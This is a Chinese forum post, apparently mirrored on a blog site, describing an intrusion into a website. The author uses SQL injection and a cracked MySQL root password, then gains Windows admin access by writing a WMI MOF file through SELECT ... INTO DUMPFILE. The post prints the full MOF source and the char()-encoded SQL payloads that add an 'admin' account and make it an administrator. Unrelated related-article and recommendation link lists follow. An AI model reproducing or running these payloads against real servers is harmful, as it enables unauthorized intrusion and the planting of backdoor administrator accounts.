无shell情况下的mysql远程mof提权利用方法详解
扫到一个站的注入
<ignore_js_op>
在havij中得到mysql数据库中mysql库保存的数据库密码:
<ignore_js_op>
有时候发现1.15版的还是最好用,最稳定,虽然速度慢了一点。
照样放到坛子里让机油破了
<ignore_js_op>
感谢Mr.Lu。顺便吐槽下,cmd5连个root都要收费。。。
在等着密码破解出来的时候顺便nmap了一下
<ignore_js_op>
意外发现端口改到了1126,给后面省下了不少时间。
照常外连试试
<ignore_js_op>
上个帖子里面有基友问这个软件是什么,我用的是navicat,感觉很好用的
现在的常规思路就是得到绝对路径,写一个小马,再进一步渗透。
但是网站上面暴不出路径,看看mysql的路径
用select @@basedir;命令可以看到;
<ignore_js_op>
网站的路径大概差不多了,懒得一个一个试了,最近mof提权挺火的,上次失败了一次,这次再来试试好了。
Mof的科普文很多,大家有兴趣看看网盘链接这两个,很详细的,大家共同学习;
http://pan.baidu.com/share/link?shareid=438074&uk=101689864
http://pan.baidu.com/share/link?shareid=438077&uk=101689864mof文件内容为:
- #pragma namespace("\\\\.\\root\\subscription")
- instance of __EventFilter as $EventFilter
- {
- EventNamespace = "Root\\Cimv2";
- Name = "filtP2";
- Query = "Select * From __InstanceModificationEvent "
- "Where TargetInstance Isa \"Win32_LocalTime\" "
- "And TargetInstance.Second = 5";
- QueryLanguage = "WQL";
- };
- instance of ActiveScriptEventConsumer as $Consumer
- {
- Name = "consPCSV2";
- ScriptingEngine = "JScript";
- ScriptText =
- "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
- };
- instance of __FilterToConsumerBinding
- {
- Consumer = $Consumer;
- Filter = $EventFilter;
- };
复制代码
于没有马,不能按照网盘里面说的先传一个mof上去,我就直接一次性写入。
先是试了试直接将原来的语句写入,提示失败,原因就是语句里面很多“;回车”之类的符号。
然后就想转化为16进制或者asc码这样。
先试了16进制。
等了老半天什么还是登陆不上去,就放弃了,改用asc码,用的sql语句为:
- select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
复制代码
效果就是添加一个用户admin密码admin;
等了有5秒,登陆框的提示从
<ignore_js_op>
变成了
<ignore_js_op> [size=0.83em]17 小时前 上传
下载附件 [size=0.83em](51.04 KB)
这时候才意识到一个问题,上面的语句只添加了用户,忘了提升为管理员了。。。
好吧,重新写一遍mof
- select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
复制代码
好了,这样就顺利登进去了;
<ignore_js_op>
改天研究一下一次性完成添加管理员试试
现在默认它还是会过5s添加一次用户,解决方法就是:
第一 net stop winmgmt 停止服务,
第二 删除文件夹:C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务
还有其他方法在网盘的文件里面有写。
一路看起来挺顺利的,是因为上次研究过这个。这次写的详细点了。
无shell情况下的mysql远程mof提权利用方法详解的更多相关文章
- MySQL服务器线程数的查看方法详解
本文实例讲述了MySQL服务器线程数的查看方法.分享给大家供大家参考,具体如下: mysql重启命令: ? 1 /etc/init.d/mysql restart MySQL服务器的线程数需要在一个合 ...
- 如何在删除ibdata1和ib_logfile的情况下恢复MySQL数据库
昨天,有个朋友对公司内部使用的一个MySQL实例开启binlog,但是在启动的过程中失败了(他也没提,为何会失败),在启动失败后,他删除了ibdata1和ib_logfile,后来,能正常启动了,但所 ...
- KVM虚拟机内无agent情况下的监控方法
KVM虚拟机内无agent情况下的监控(ceilometer实现) 今天看到大家在群里讨论KVM虚拟机的监控问题,而且是要求VM内无agent情况下的监控.这方面确实没有深入研究,但尚有些openst ...
- 关于img标签浏览器自带的边框,清除边框的解决方式(即img[src=""] img无路径情况下,灰色边框去除解决方法)
详解img[src=""] img无路径情况下,灰色边框去除解决方法 1.Js解决办法 <html> <head> <meta charset=&qu ...
- mysql 远程连接数据库的二种方法
http://blog.csdn.net/freecodetor/article/details/5799550 一.连接远程数据库: 1.显示密码 如:MySQL 连接远程数据库(192.168.5 ...
- mysql 远程连接数据库的二种方法
一.连接远程数据库: 1.显示密码 如:MySQL 连接远程数据库(192.168.5.116),端口"3306",用户名为"root",密码"123 ...
- 转 mysql 远程连接数据库的二种方法
mysql 远程连接数据库的二种方法 一.连接远程数据库: 1.显示密码 如:MySQL 连接远程数据库(192.168.5.116),端口“3306”,用户名为“root”,密码“123456” ...
- Centos下忘记mysql的root密码的解决方法
Centos下忘记mysql的root密码的解决方法 一:(停掉正在运行的mysql) [root@NetDakVPS ~]# service mysql stop 二:使用 “--skip-gran ...
- 【转】CentOS6下安装mysql后,重置root密码方法
本文转自:CentOS6下安装mysql后,重置root密码方法 centos下安装mysql,居然不知道root用户密码,本想重装,不过还是先度娘了一些,发现这篇文章,刚好解决我的燃眉之急,太赞了. ...
随机推荐
- java基础-002
1.Java虚拟机和“平台无关语言” Java虚拟机是可以执行字节码的虚拟机进程.Java源文件被编译成被Java虚拟机执行的字节码文件. Java被设计成允许应用程序运行在任意的平台,而不需要程序员 ...
- python利用or在列表解析中调用多个函数.py
python利用or在列表解析中调用多个函数.py """ python利用or在列表解析中调用多个函数.py 2016年3月15日 05:08:42 codegay & ...
- PHP面向对象的继承
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...
- android application plugins framework
android插件式开发 android application plugins framework http://code.google.com/p/android-application-plug ...
- iOS 开发之推力动画效果
步骤: 1.使用single view application 创建新的项目 2.在.h文件中需要遵守两个协议<UICollisionBehaviorDelegate,UIGestureReco ...
- C++面向过程解决三阶行列式问题
#include<iostream> #include <cstdlib> using namespace std; int print() { cout<<&qu ...
- HDOJ-三部曲一(搜索、数学)-1002-Children of the Candy Corn
Children of the Candy Corn Time Limit : 2000/1000ms (Java/Other) Memory Limit : 131072/65536K (Jav ...
- ios学习之 关于Certificate、Provisioning Profile、App ID的介绍及其之间的关系
刚接触iOS开发的人难免会对苹果的各种证书.配置文件等不甚了解,可能你按照网上的教程一步一步的成功申请了真机调试,但是还是对其中的缘由一知半解.这篇文章就对Certificate.Provisioni ...
- IOS 作业项目(3) 霓虹灯效果
先上效果图 #import "CHViewController.h"@interface CHViewController (){ int i; int j;}@pro ...
- Postfix之telnet测试
1.# 2. 3.#若没安装telnet 需安装telnet 4.yum install telnet 5. 6.#telnet测试smtp连接postfix 7.telnet 127.0.0.1 2 ...